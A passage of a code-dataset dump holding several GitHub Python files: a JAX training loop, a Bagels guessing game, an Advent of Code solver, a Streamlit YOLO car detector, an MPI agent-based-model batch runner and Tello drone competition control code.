floats\"\"\"\n return jnp.divide(images, 255)\n\n#\n# Model functions\n#\n\n\ndef accuracy(net, key, params, images, labels, **kwargs):\n \"\"\"\n Compute classification accuracy given a model, parameters, and dataset.\n \"\"\"\n\n yhat = net.apply(params, key, images, **kwargs)\n yhat = jnp.argmax(yhat, axis=1)\n return yhat == labels\n\n\ndef update_params(model: hk.Transformed, \n key,\n trainable_params: hk.Params = None, \n non_trainable_params: hk.Params = None, \n loss_fn = None, \n data = None, \n optimizer = None, \n opt_state = None, \n **kwargs):\n \"\"\"\n Training loop update step. \n \"\"\"\n\n #separate the image and label data from the batch\n xd = data['image']\n yd = data['label']\n\n #lambda function to compute loss \n batch_loss = lambda tp, ntp: jnp.mean(loss_fn(\n model.apply(hk.data_structures.merge(tp, ntp), key, xd, is_training=True, **kwargs),\n yd))\n\n #compute the loss value and gradients\n loss_value = batch_loss(trainable_params, non_trainable_params)\n gradients = jax.grad(batch_loss)(trainable_params, non_trainable_params)\n \n #compute trainable parameter updates using the optimizer\n updates, opt_state = optimizer.update(gradients, opt_state)\n new_trainable_params = optax.apply_updates(trainable_params, updates)\n \n return new_trainable_params, opt_state, loss_value\n\ndef train_model(model, \n key,\n params = None,\n optimizer = None,\n dataset = None,\n loss_fn = None,\n batches: int = None,\n loss_history = None,\n opt_state = None,\n non_trainable_params = [\"codebook\", \"static_projection\", \"classification_query\"],\n **kwargs):\n \"\"\"\n Main training loop for reducing loss for a model on a dataset.\n \"\"\"\n\n #separate the trainable and non-trainable model parameters - non-trainable parameters are passed\n # via the non_trainable_params arg above\n trainable_params, non_trainable_params = hk.data_structures.partition(\n #return false for each of the non-trainable parameters in the model\n lambda m, n, v: bool(reduce(lambda a,b: a*b, [name not in m for name in non_trainable_params])),\n params\n )\n\n #if there is no loss history to append to (first run)\n if loss_history == None:\n loss_history = []\n\n #if there is no previous optimizer state (first run or stateless optimizer)\n if opt_state == None:\n opt_state = optimizer.init(trainable_params)\n\n \n #lambda calls parameters, batch, and optimizer state\n update_fn = lambda train_params, nontrain_params, batch, opt_state: update_params(\n model, \n key, \n trainable_params = train_params, \n non_trainable_params = nontrain_params, \n loss_fn = loss_fn, \n data = batch, \n optimizer = optimizer, \n opt_state = opt_state, \n **kwargs)\n\n #main optimizer loop\n for i in tqdm(range(batches)):\n batch = next(dataset)\n #call the update lambda\n trainable_params, opt_state, loss_val = update_fn(trainable_params, \n non_trainable_params, \n batch, \n opt_state)\n\n #append the loss value\n loss_history.append(loss_val)\n\n #merge the parameters back together\n new_params = hk.data_structures.merge(trainable_params, non_trainable_params)\n\n return new_params, loss_history\n\n","repo_name":"wilkieolin/FHRR_networks","sub_path":"FHRR/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"11147613655","text":"import random\n\ndef getClue(secretNumber, guess):\n clue = ''\n for number in range(3):\n if guess[number] in secretNumber and secretNumber[number] != guess[number]:\n clue += 'Fermi '\n elif secretNumber[number] == guess[number]:\n clue += 'Pico '\n if clue == '':\n clue += 'Bagels '\n return clue\n\nwhile True:\n secretNumber = ''\n for i in range(3):\n secretNumber += str(random.randint(0, 9))\n attempts = 1\n print('''I am thinking of a 3-digit number. Try to guess what it is.\nThe clues I give are...\nWhen I say: That means:\nBagels None of the digits is correct.\nPico One digit is correct but in the wrong position.\nFermi One digit is correct and in the right position.\nI have thought of a number. You have 10 guesses.''')\n while True:\n if attempts > 10:\n print('You lost!')\n print('The secret number was ' + str(secretNumber))\n break\n while True:\n print('Guess #' + str(attempts))\n guess = str(input())\n if guess[0] == 0:\n guess2 = guess[1:]\n else:\n guess2 = guess\n try:\n guess3 = int(guess2)\n except:\n continue\n if len(guess) == 3:\n break\n if guess == secretNumber:\n print('You won!')\n break\n print(getClue(secretNumber, guess))\n attempts += 1\n \n","repo_name":"Straw17/games","sub_path":"Bagels.py","file_name":"Bagels.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12780701855","text":"# ======================================================================\n# Arithmetic Logic Unit\n# Advent of Code 2021 Day 24 -- Eric Wastl -- https://adventofcode.com\n#\n# Python implementation by Dr. Dean Earl Wright III\n# ======================================================================\n\n# ======================================================================\n# m o n a d . p y\n# ======================================================================\n\"A solver for the Advent of Code 2021 Day 24 puzzle\"\n\n# ----------------------------------------------------------------------\n# import\n# ----------------------------------------------------------------------\nimport alu\n\n# ----------------------------------------------------------------------\n# constants\n# ----------------------------------------------------------------------\nCONSTANTS = [4, 5, 15]\nNUM_LOOP = 14\nLEN_LOOP = 18\nDIGITS = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nSTIGID = [9, 8, 7, 6, 5, 4, 3, 2, 1]\n\n# ======================================================================\n# Monad\n# ======================================================================\n\n\nclass Monad(object): # pylint: disable=R0902, R0205\n \"Object for Arithmetic Logic Unit\"\n\n def __init__(self, text=None, part2=False, inp=None):\n\n # 1. Set the initial values\n self.part2 = part2\n self.text = text\n self.alu = None\n self.constants = []\n\n # 2. Process text (if any)\n if text is not None and len(text) > 0:\n self.alu = alu.Alu(text=text, part2=part2, inp=inp)\n for offset in CONSTANTS:\n constants = []\n for loop in range(NUM_LOOP):\n index = loop * LEN_LOOP + offset\n value = self.alu.inst[index][2]\n constants.append(value)\n self.constants.append(constants)\n\n def block(self, which, digit, z_reg):\n \"Execute a single digit block\"\n\n # 1. Keep all previous digits or lose one\n z_1_26 = z_reg // self.constants[0][which]\n\n # 2. Do we match the adjusted last digit?\n if digit == z_reg % 26 + self.constants[1][which]:\n return z_1_26\n\n # 3. Else push the digit on the stack\n return 26 * z_1_26 + digit + self.constants[2][which]\n\n def run(self, digits):\n \"Run the entire program block by block\"\n\n # 1. Precondition axioms\n assert len(digits) == NUM_LOOP\n\n # 2. Start with nothing\n result = 0\n\n # 3. For for all the digits\n for index, digit in enumerate(digits):\n\n # 4. Execute the block\n result = self.block(index, int(digit), result)\n\n # 5. Return the final result\n return result\n\n def unblock(self, which, digit, z_reg):\n \"Reverse a block of code to get possible previous z values\"\n\n # 1. Start with nothing\n result = []\n\n # 2. Reconstruct the x register\n x_reg = z_reg - digit - self.constants[2][which]\n if x_reg % 26 == 0:\n result.append(x_reg // 26 * self.constants[0][which])\n\n # 3. Reconstruct the z register\n if 0 <= digit - self.constants[1][which] < 26:\n z_prev = z_reg * self.constants[0][which]\n result.append(digit - self.constants[1][which] + z_prev)\n\n # 4. Return the possible previous z values\n return result\n\n def unrun(self, digits=None):\n \"Solve the puzzle by executing the blocks in reverse order\"\n\n # 1. Have to start somewhere\n result = {}\n previous = set([0])\n\n # 2. Loop backwards through the blocks\n for which in range(13, -1, -1):\n\n # 3. Collect some z's [Sleep, I remember sleep]\n z_set = set()\n\n # 4. Loop for all of the digits and previous z's\n for digit in digits:\n\n # 5. Loop for all prevopus z's\n for z_reg in previous:\n\n # 6. Undo this block with these inputs\n z_possible = self.unblock(which, digit, z_reg)\n\n # 7. Add all the possible z's to the set\n for z_pos in z_possible:\n z_set.add(z_pos)\n if z_reg in result:\n z_pos_digits = [digit]\n z_pos_digits.extend(result[z_reg])\n result[z_pos] = z_pos_digits\n else:\n result[z_pos] = [digit]\n\n # 8. Update previous\n previous = z_set\n\n # 9. Return the digits\n return ''.join([str(_) for _ in result[0]])\n\n def part_one(self, verbose=False, limit=0):\n \"Returns the solution for part one\"\n\n # 0. Precondition axioms\n assert verbose in [True, False]\n assert limit >= 0\n\n # 1. Return the solution for part one\n return self.unrun(digits=DIGITS)\n\n def part_two(self, verbose=False, limit=0):\n \"Returns the solution for part two\"\n\n # 0. Precondition axioms\n assert verbose in [True, False]\n assert limit >= 0\n\n # 1. Return the solution for part two\n return self.unrun(digits=STIGID)\n\n\n# ----------------------------------------------------------------------\n# module initialization\n# ----------------------------------------------------------------------\nif __name__ == '__main__':\n pass\n\n# ======================================================================\n# end m o n a d . p y end\n# ======================================================================\n","repo_name":"deanearlwright/AdventOfCode","sub_path":"2021/24_ArithmeticLogicUnit/monad.py","file_name":"monad.py","file_ext":"py","file_size_in_byte":5912,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"13088429824","text":"import streamlit as st\nimport torch\nimport PIL \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\n\n\ndef get_yolo_detection():\n \n st.markdown('''

    Приложение по детекции автомобилей Тесла. Вы сможете определить:

    CyberTruck, Model3, ModelS, ModelX, ModelY и Roadster

    ''',\n unsafe_allow_html=True)\n\n\n model = torch.hub.load('ultralytics/yolov5', 'custom', path='our_models/best.pt')\n img_file = st.file_uploader('Choose photo', type=['png', 'jpg', 'jpeg'], accept_multiple_files=False)\n \n \n if img_file:\n img = PIL.Image.open(img_file)\n results = model(img)\n fig, ax = plt.subplots()\n plt.axis('off')\n ax.imshow(results.render()[0])\n st.pyplot(fig)\n","repo_name":"abidgaidarov/cv_project","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72014994338","text":"import logging as log\nimport os\nfrom mpi4py import MPI\nfrom datetime import datetime\nimport time\nimport json\n\n\nstart_time = time.time()\n\n# Initialize MPI\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n\n# set up logging to output to cwd /data\n# log debug messages to file\n# info message to console\ncwd = os.getcwd()\nlog_path = os.path.join(cwd, \"./log/\")\nos.makedirs(log_path, exist_ok=True)\n\ndata_path = os.path.join(cwd, \"./data/\")\nos.makedirs(data_path, exist_ok=True)\n\n# Get the current date as a string in the format 'YYYY-MM-DD'\ncurrent_date = datetime.now().strftime(\"%Y-%m-%d\")\n\n# Create a date folder in the data directory\ndate_data_path = os.path.join(data_path, current_date)\nos.makedirs(date_data_path, exist_ok=True)\n\n# Create model and agent folders inside the date folder\nos.makedirs(os.path.join(date_data_path, \"model/\"), exist_ok=True)\nos.makedirs(os.path.join(date_data_path, \"agent/\"), exist_ok=True)\nos.makedirs(os.path.join(date_data_path, \"model_end/\"), exist_ok=True)\n\n\nfrom resistance_cascade.model import ResistanceCascade\nfrom mesa.batchrunner import FixedBatchRunner\nfrom itertools import product\n\nlog.basicConfig(filename=f\"{cwd}/log/batch.log\", level=log.DEBUG)\n\n# parameters that will remain constant\nfixed_parameters = {\"multiple_agents_per_cell\": True, \"threshold\": 2.94444}\n\n# parameters that will vary load from json file\nwith open(\"resistance_cascade/batch_run_params.json\", \"r\") as f:\n params = json.load(f)\n\n# Helper function to generate all possible combinations of parameters\ndef dict_product(dicts):\n \"\"\"\n >>> list(dict_product(dict(number=[1,2], character='ab')))\n [{'character': 'a', 'number': 1},\n {'character': 'a', 'number': 2},\n {'character': 'b', 'number': 1},\n {'character': 'b', 'number': 2}]\n \"\"\"\n return (dict(zip(dicts, x)) for x in product(*dicts.values()))\n\n\n# Helper function to divide the parameter list into blocks\ndef chunks(lst, chunk_size):\n return [lst[i : i + chunk_size] for i in range(0, len(lst), chunk_size)]\n\n\n# set up the reporters\nmodel_reporters = {\n \"Seed\": lambda m: m.report_seed(m),\n \"Citizen Count\": lambda m: m.count_citizen(m),\n \"Active Count\": lambda m: m.count_active(m),\n \"Oppose Count\": lambda m: m.count_oppose(m),\n \"Support Count\": lambda m: m.count_support(m),\n \"Speed of Spread\": lambda m: m.speed_of_spread(m),\n \"Security Density\": lambda m: m.report_security_density(m),\n \"Private Preference\": lambda m: m.report_private_preference(m),\n \"Epsilon\": lambda m: m.report_epsilon(m),\n \"Threshold\": lambda m: m.report_threshold(m),\n \"Revolution\": lambda m: m.report_revolution(m),\n}\n\nagent_reporters = {\n \"pos\": \"pos\",\n \"condition\": \"condition\",\n \"opinion\": \"opinion\",\n \"activation\": \"activation\",\n \"private_preference\": \"private_preference\",\n \"epsilon\": \"epsilon\",\n \"oppose_threshold\": \"oppose_threshold\",\n \"active_threshold\": \"active_threshold\",\n \"jail_sentence\": \"jail_sentence\",\n \"actives_in_vision\": \"actives_in_vision\",\n \"opposed_in_vision\": \"opposed_in_vision\",\n \"support_in_vision\": \"support_in_vision\",\n \"security_in_vision\": \"security_in_vision\",\n \"perception\": \"perception\",\n \"arrest_prob\": \"arrest_prob\",\n \"active_level\": \"active_level\",\n \"oppose_level\": \"oppose_level\",\n \"flip\": \"flip\",\n \"ever_flipped\": \"ever_flipped\",\n \"model_seed\": \"dc_seed\",\n \"model_security_density\": \"dc_security_density\",\n \"model_private_preference\": \"dc_private_preference\",\n \"model_epsilon\": \"dc_epsilon\",\n \"model_threshold\": \"dc_threshold\",\n}\n\n# Generate the list of all possible parameter combinations\nall_parameters_list = list(dict_product(params))\n\n# For use if the batch run is interrupted, checks all filenames and cross-references with the parameter list\nfolder_path = \"data/2023-04-25/model/\"\n\nif os.path.exists(folder_path):\n filenames = os.listdir(folder_path)\nelse:\n filenames = None\n\n# Filter out parameter combinations that already have a corresponding file\ndef file_exists(param_dict):\n filename = f\"model_seed_{param_dict['seed']}_pp_{param_dict['private_preference_distribution_mean']}_sd{param_dict['security_density']}_ep_{param_dict['epsilon']}_th{fixed_parameters['threshold']}.parquet\"\n return os.path.exists(os.path.join(folder_path, filename))\n\nif filenames:\n filtered_parameters_list = [param_dict for param_dict in all_parameters_list if not file_exists(param_dict)]\nelse:\n filtered_parameters_list = all_parameters_list\n\n# Divide the parameter list into blocks of 20\nblock_size = 10\nparameter_blocks = chunks(filtered_parameters_list, block_size)\nmax_steps = 500\n# Initialize the dynamic load balancing\nif rank == 0: # If it's the master rank\n log.info(\"Starting batch run\")\n print(f\"Number of parameter combinations: {len(filtered_parameters_list)}\")\n log.info(f\"Number of parameter combinations: {len(filtered_parameters_list)}\")\n print(f\"Number of blocks: {len(parameter_blocks)}\")\n log.info(f\"Number of blocks: {len(parameter_blocks)}\")\n\n next_block_index = 0\n received_blocks = 0 # Add a counter for received blocks\n\n for i in range(1, size): # Assign an initial block to each worker rank\n if next_block_index < len(parameter_blocks):\n comm.send(\n (parameter_blocks[next_block_index], next_block_index), dest=i, tag=100\n )\n next_block_index += 1\n else:\n comm.send((\"DONE\", -1), dest=i, tag=100)\n\n # Receive the results from the worker ranks and write them to CSV files\n while received_blocks < len(parameter_blocks): # Change the loop condition\n data = comm.recv(source=MPI.ANY_SOURCE, tag=200)\n (\n rank_sender,\n block_num,\n # batch_end_model,\n batch_step_model_raw,\n batch_step_agent_raw,\n ) = data\n\n print(f\"Received block {block_num} from rank {rank_sender}\")\n log.info(f\"Received block {block_num} from rank {rank_sender}\")\n\n # batch_end_model.to_parquet(\n # f\"{date_data_path}/model_end/model_block_{block_num}_rank_{rank_sender}.parquet\"\n # )\n\n for key, df in batch_step_agent_raw.items():\n df.to_parquet(\n f\"{date_data_path}/agent/agent_seed_{key[0]}_pp_{key[1]}_sd{key[2]}_ep_{key[3]}_th{key[4]}.parquet\"\n )\n\n received_blocks += 1 # Increment the received blocks counter\n\n # Send a new block to the worker rank that just finished\n if next_block_index < len(parameter_blocks):\n comm.send(\n (parameter_blocks[next_block_index], next_block_index),\n dest=rank_sender,\n tag=100,\n )\n next_block_index += 1\n print(f\"Sent block {next_block_index} to rank {rank_sender}\")\n log.info(f\"Sent block {next_block_index} to rank {rank_sender}\")\n else:\n comm.send((\"DONE\", -1), dest=rank_sender, tag=100)\n \n for key, df in batch_step_model_raw.items():\n df.to_parquet(\n f\"{date_data_path}/model/model_seed_{key[0]}_pp_{key[1]}_sd{key[2]}_ep_{key[3]}_th{key[4]}.parquet\"\n )\n\n\n\nelse: \n while True:\n # Receive a block of parameters from the master rank\n block, block_num = comm.recv(source=0, tag=100)\n\n if block == \"DONE\": \n break\n\n parameters_list = block\n batch_run = FixedBatchRunner(\n ResistanceCascade,\n parameters_list,\n fixed_parameters,\n model_reporters=model_reporters,\n agent_reporters=agent_reporters,\n max_steps=max_steps,\n )\n\n batch_run.run_all()\n\n # batch_end_model = batch_run.get_model_vars_dataframe()\n batch_step_model_raw = batch_run.get_collector_model()\n batch_step_agent_raw = batch_run.get_collector_agents()\n\n # Send the results back to the master rank for writing\n comm.send(\n (\n rank,\n block_num,\n # batch_end_model,\n batch_step_model_raw,\n batch_step_agent_raw,\n ),\n dest=0,\n tag=200,\n )\n\n# When all blocks have been processed, the master rank sends a \"DONE\" message to each worker rank\nif rank == 0:\n for i in range(1, size):\n comm.send((\"DONE\", -1), dest=i, tag=100)\n\nend_time = time.time()\ntime_taken = end_time - start_time\nprint(f\"Job completed in {time_taken} seconds.\")\nlog.info(f\"Job completed in {time_taken} seconds.\")\n","repo_name":"JoeHelbing/cascade","sub_path":"batch_run.py","file_name":"batch_run.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13638123253","text":"#2022 LockheedMartin Falcon Challenger\n#Team EML\n#github.com/blu-y/eml\n#-*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nimport pyzbar.pyzbar as pyzbar\nfrom djitellopy import tello\nimport time\nimport matplotlib.pyplot as plt\nimport torch\nimport pandas as pd\nimport os\nfrom os import path\nimport sys\nfrom math import log\n\n'''\n기본 명령\ndrone.move_up(50)\ndrone.send_control_command(\"down {}\".format(20))\ndrone.send_command_without_return(\"rc {} {} {} {}\".format(a,b,c,d))\n# a b c d : 좌우 ?��?�� ?��?�� yaw -100~100\n'''\n\nclass qr():\n def __init__(self):\n self.detector = cv2.QRCodeDetector()\n def detect(self, img):\n qrimg = np.copy(img)\n qr_value = ''\n for code in pyzbar.decode(qrimg):\n qr_value = code.data.decode('utf-8')\n if qr_value == '': qr_value, bbox, qrimg = self.detect_cv(qrimg)\n #if qr_value != '': print('QR detected: ', qr_value)\n return qr_value\n def detect_cv(self, img):\n qrimg = np.copy(img)\n try:\n value, bbox, _ = self.detector.detectAndDecode(img)\n bbox = bbox.astype(int)\n cv2.drawContours(qrimg, bbox, 0,(0,255,255), 3)\n return value, bbox, qrimg\n except: return '', '', qrimg\n\nclass YOLO():\n def __init__(self, pt='best.pt'):\n #self.model = torch.hub.load('ultralytics/yolov5', 'custom', path='yolo.pt', force_reload=False)\n self.model = torch.hub.load('yolov5-master','custom',path=pt,source='local')\n #self.model.cuda()\n def detect_letter(self, img):\n yolo = self.model(img)\n df = yolo.pandas().xyxy[0]\n img = yolo.render()[0]\n if df.shape[0]>0:\n ret = True\n letter = df['name']\n print('letter = \\n', letter)\n letter = int(letter[0])\n else: \n ret = False\n letter = None\n return ret, letter, img\n def detect_object(self, img):\n yolo = self.model(img)\n df = yolo.pandas().xyxy[0]\n img = yolo.render()[0]\n if df.shape[0]==0:\n df = pd.DataFrame()\n return df, img\n\nclass drone_tello():\n def __init__(self, takeoff = 1, debug = 0):\n '''\n Tello drone initialize:\n '''\n self.tstart = time.time()\n self.tello = tello.Tello()\n self.tello.connect()\n #self.tello.set_video_resolution(tello.Tello.RESOLUTION_480P)\n self.tello.streamon()\n print('battery: ', self.tello.get_battery(), '%\\n')\n self.tello.send_command_without_return(\"rc {} {} {} {}\".format(0,0,0,0))\n self.takeoff = takeoff\n self.debug = debug\n if self.takeoff == 1 : self.tello.takeoff()\n self.qrd = qr()\n def control(self, left=0, right=0, front=0, back=0, up=0, down=0, yaw=0):\n #drone.send_command_without_return(\"rc {} {} {} {}\".format(a, b, c, d))\n #a b c d : 좌우 ?��?�� ?��?�� yaw -100~100\n if self.takeoff == 1: \n self.tello.send_command_without_return(\"rc {} {} {} {}\".format(right-left, front-back, up-down, yaw))\n def com(self, command):\n if self.takeoff == 1: \n self.tello.send_command_without_return(command)\n def com_r(self, command):\n if self.takeoff == 1: \n return self.tello.send_control_command(command)\n def control_r(self, left=0, right=0, front=0, back=0, up=0, down=0, yaw=0):\n #drone.send_control_command(\"rc {} {} {} {}\".format(a, b, c, d))\n #a b c d : 좌우 ?��?�� ?��?�� yaw -100~100\n if self.takeoff == 1: \n return self.tello.send_control_command(\"rc {} {} {} {}\".format(right-left, front-back, up-down, yaw))\n else: return False\n def get_frame(self):\n self.frame_ = self.tello.get_frame_read().frame\n self.frame = cv2.resize(self.frame_, (360, 240))\n #self.frame = cv2.GaussianBlur(self.frame, (3,3), 1, 1)\n return self.frame\n def cw(self, d):\n if self.takeoff == 1: return self.com(\"cw {}\".format(d))\n def ccw(self, d):\n if self.takeoff == 1: return self.com(\"ccw {}\".format(d))\n def flip(self, s):\n if self.takeoff == 1: return self.com_r(\"flip {}\".format(s))\n def up(self, d):\n if self.takeoff == 1: return self.tello.move_up(d)\n def down(self, d):\n if self.takeoff == 1: return self.tello.move_down(d)\n def left(self, d):\n if self.takeoff == 1: return self.tello.move_left(d)\n def right(self, d):\n if self.takeoff == 1: return self.tello.move_right(d)\n def forward(self, d):\n if self.takeoff == 1: return self.tello.move_forward(d)\n def back(self, d):\n if self.takeoff == 1: return self.tello.move_back(d)\n def land(self):\n if self.takeoff == 1: self.tello.land()\n self.tend = time.time()\n self.time = self.tend - self.tstart\n print(f'Time : {self.time:.3f}')\n print('battery: ', self.tello.get_battery(), '%\\n')\n if self.debug == 1:\n plt.figure('frame')\n plt.imshow(self.frame)\n plt.figure('original')\n plt.imshow(self.frame_)\n plt.figure('hsv')\n plt.imshow(cv2.cvtColor(self.frame_, cv2.COLOR_BGR2HSV))\n plt.show()\n def qr(self, show = 1):\n value = self.qrd.detect(self.frame_)\n if value != '':\n if show == 1: print('QR detected : ', value)\n return value\n def hw(self, show = 1):\n value = self.hwd.detect(self.frame_)\n if show == 1: print('Number detected : ', value)\n return value\n\ndef clr_bin(img, clr, r=20, s=150, v=100):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n img_h = hsv[:,:,0]\n img_s = hsv[:,:,1]\n img_v = hsv[:,:,2]\n img_b_r = cv2.inRange(img_h, 180-r, 180)\n img_b_r = img_b_r + cv2.inRange(img_h, 0, r)\n img_b_r[img_v>v+40] = 0 #+40??? ?��?�� ?��?��\n img_b_r[img_sv] = 0\n img_b_g[img_sv] = 0\n img_b_b[img_s 45:\n print(cir[clr], clr, 'detected')\n cv2.imwrite(clr+'circle.png', img)\n if abs(cir[clr][0][0]-self.cen['x'])>30 or abs(cir[clr][0][1]-self.cen['y'])>30 or cir[clr][0][2] < (self.cen['z']-30):\n x_e = (cir[clr][0][0]-self.cen['x'])\n z_e = (self.cen['z']-cir[clr][0][2])\n y_e = (self.cen['y']-cir[clr][0][1])\n return \"rc {} {} {} {}\".format(\n self.pd('x',sign(x_e)*log(abs(x_e)+1)),\n 0.5*self.pd('z',sign(z_e)*log(abs(z_e)+1)),\n 1.2*self.pd('y',sign(y_e)*log(abs(y_e)+1)),\n 0)\n #return \"rc {} {} {} {}\".format((cir[clr][0][0]-180)/2.6+(cir[clr][0][0]-180),(80-cir[clr][0][2])/1.5,(100-cir[clr][0][1])/2,0)\n self.clear()\n return True\n def object(self, df, img, label=\"'F22'\"):\n try:\n df = df.query(\"name == \"+label)\n df = df.reset_index()\n df, obj, cor = obj_filter(df, img, label)\n except : return \"rc {} {} {} {}\".format(0,0,0,50)\n if df.empty == True:\n return \"rc {} {} {} {}\".format(0,0,0,50)\n #print(df)\n xmax = int(df['xmax'][0])\n xmin = int(df['xmin'][0])\n ymax = int(df['ymax'][0])\n ymin = int(df['ymin'][0])\n x = int((xmax+xmin)/2)\n y = int((ymax+ymin)/2)\n size = int(np.sqrt(((xmax-xmin)*(ymax-ymin))))\n if size > 60:\n print([x,y, size], label, 'detected')\n if abs(x-self.cen['x'])>30 or abs(y-self.cen['y'])>30 or size < (self.cen['z']-40):\n x_e = (x-self.cen['x'])\n z_e = (self.cen['z']-size)\n y_e = (self.cen['y']-y)\n return \"rc {} {} {} {}\".format(\n 0.5*self.pd('x',sign(x_e)*log(abs(x_e)+1)),\n 0.4*self.pd('z',sign(z_e)*log(abs(z_e)+1)),\n 0.5*self.pd('y',sign(y_e)*log(abs(y_e)+1)),\n 0)\n self.clear()\n cv2.imwrite('KAU.jpg', img)\n return True\n def plane(self, df, img, label=\"'F22'\"):\n if df.empty == True:\n return \"rc {} {} {} {}\".format(0,0,0,0)\n xmax = int(df['xmax'][0])\n xmin = int(df['xmin'][0])\n ymax = int(df['ymax'][0])\n ymin = int(df['ymin'][0])\n x = int((xmax+xmin)/2)\n y = int((ymax+ymin)/2)\n size = int(np.sqrt(((xmax-xmin)*(ymax-ymin))))\n if size > 60:\n print([x,y, size], label, 'detected')\n cv2.imwrite('F22_.jpg', img)\n if abs(x-self.cen['x'])>20:\n x_e = (x-self.cen['x'])\n z_e = (self.cen['z']-size)\n y_e = (self.cen['y']-y)\n return \"rc {} {} {} {}\".format(\n 0.5*self.pd('x',sign(x_e)*log(abs(x_e)+1)), 0, 0, 0)\n self.clear()\n return True\n\ndef obj_filter(df, img, label=\"'F22'\"):\n obj = []\n cor = []\n df = df.drop('index', axis=1)\n for i in range(df.shape[0]):\n X = int(df['xmax'][i])\n x = int(df['xmin'][i])\n Y = int(df['ymax'][i])\n y = int(df['ymin'][i])\n frame = img[y:Y, x:X]\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n hist = cv2.calcHist(hsv, [0], None, [10], [0,256])\n hist_std = hist/np.sum(hist)\n #print(hist_std[0], hist_std[1], hist_std[2], hist_std[3], hist_std[4], hist_std[5], hist_std[6], hist_std[7], hist_std[8], hist_std[9])\n if label == \"'KAU'\":\n if hist_std[5]+hist_std[6]+hist_std[7] > 0.2:\n obj.append(frame)\n cor.append([x,X,y,Y])\n else: df = df.drop(i)\n if label == \"'F22'\":\n if hist_std[5]+hist_std[6]+hist_std[7] > 0.2:\n obj.append(frame)\n cor.append([x,X,y,Y])\n else: df = df.drop(i)\n df = df.reset_index()\n df = df.drop('index', axis=1)\n return df, obj, cor\n\ndef puttext(img, txt, org, clr=(0,0,0)):\n cv2.putText(img, txt, org, cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))\n return img\n\ndef sign(i):\n if i<0 : return -1\n return 1\n\n'''\ndef calc(formula):\n num1 = int(formula[0])\n num2 = int(formula[2])\n oper = formula[1]\n if oper == '+':\n return num1+num2\n elif oper == '-':\n return num1-num2\n elif oper == '*':\n return num1*num2\n elif oper == '/':\n return num1/num2\n else: return 'X'\n\ndef imageGP(img):\n qrd=qr()\n src = np.copy(img)\n height, width, channel = src.shape\n\n srcPoint1 = np.array([[0, 0], [width-200, 0], [width-200, height], [0, height]], dtype=np.float32)\n srcPoint2 = np.array([[0, 0], [width - 100, 0], [width - 100, height], [0, height]], dtype=np.float32)\n srcPoint3 = np.array([[200, 0], [width, 0], [width, height], [200, height]], dtype=np.float32)\n srcPoint4 = np.array([[100, 0], [width, 0], [width, height], [100, height]], dtype=np.float32)\n dstPoint = np.array([[0, 0], [width, 0], [width, height], [0, height]], dtype=np.float32)\n\n matrix1 = cv2.getPerspectiveTransform(srcPoint1, dstPoint)\n dst1 = cv2.warpPerspective(src, matrix1, (width, height))\n matrix2 = cv2.getPerspectiveTransform(srcPoint2, dstPoint)\n dst2 = cv2.warpPerspective(src, matrix2, (width, height))\n matrix3 = cv2.getPerspectiveTransform(srcPoint3, dstPoint)\n dst3 = cv2.warpPerspective(src, matrix3, (width, height))\n matrix4 = cv2.getPerspectiveTransform(srcPoint4, dstPoint)\n dst4 = cv2.warpPerspective(src, matrix4, (width, height))\n \n qr_value = qrd.detect(src)\n if qr_value != '':\n return qr_value\n qr_value = qrd.detect(dst1)\n if qr_value != '':\n return qr_value\n qr_value = qrd.detect(dst2)\n if qr_value != '':\n return qr_value\n qr_value = qrd.detect(dst3)\n if qr_value != '':\n return qr_value\n qr_value = qrd.detect(dst4)\n if qr_value != '':\n return qr_value\n return ''\n\ndef box_det(img, r=20):\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n _, img_bin = cv2.threshold(img_gray, 0, 255, cv2.THRESH_OTSU) # white+else so, binary\n cnt, _ = cv2.findContours(img_bin, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n img_con = np.copy(img)\n rect = []\n color = []\n cent = []\n area = img.shape[0]*img.shape[1]\n for pts in cnt:\n if cv2.contourArea(pts)<2000 or cv2.contourArea(pts)>area*0.8:\n continue\n eps = 0.05*cv2.arcLength(pts, True)\n app = cv2.approxPolyDP(pts, eps, True)\n cor = len(app)\n if cor == 4: # rectangular\n cent = np.mean(app, axis=0).astype(np.uint16).squeeze()\n color_ = clr(img,cent, r)\n cv2.drawContours(img_con, [app], 0,(0,255,255), 3)\n if color_ != 'X':\n cv2.circle(img_con, cent, 5, (0,255,255), 2)\n cv2.putText(img_con, clr(img,cent, r), cent+10, cv2.FONT_HERSHEY_PLAIN, 1, (0,255,255))\n rect.append(cent)\n color.append(color_)\n #cv2.imshow('Bin', img_bin)\n #cv2.imshow('Con', img_con)\n #cv2.imshow('canny', canny)\n if len(color) == 0:\n color = None\n else: color = color[0]\n return cent, color, img_con\n \ndef mission_action(i):\n #i = calc(s) # string >> calculating\n a1 = \"\"\n a2 = \"\"\n a3 = \"\"\n a4 = \"\"\n if i == 1:\n a1 = \"up {}\".format(30)\n a2 = \"down {}\".format(30)\n print('answer = 1, up 30, down 30')\n if i == 2:\n a1 = \"back {}\".format(30)\n a2 = \"flip {}\".format(\"f\")\n print('answer = 2, flip forward')\n if i == 3:\n a1 = \"down {}\".format(30)\n a2 = \"up {}\".format(30)\n print('answer = 3, down 30, up 30')\n if i == 4:\n a1 = \"right {}\".format(20)\n a2 = \"flip {}\".format(\"l\") \n 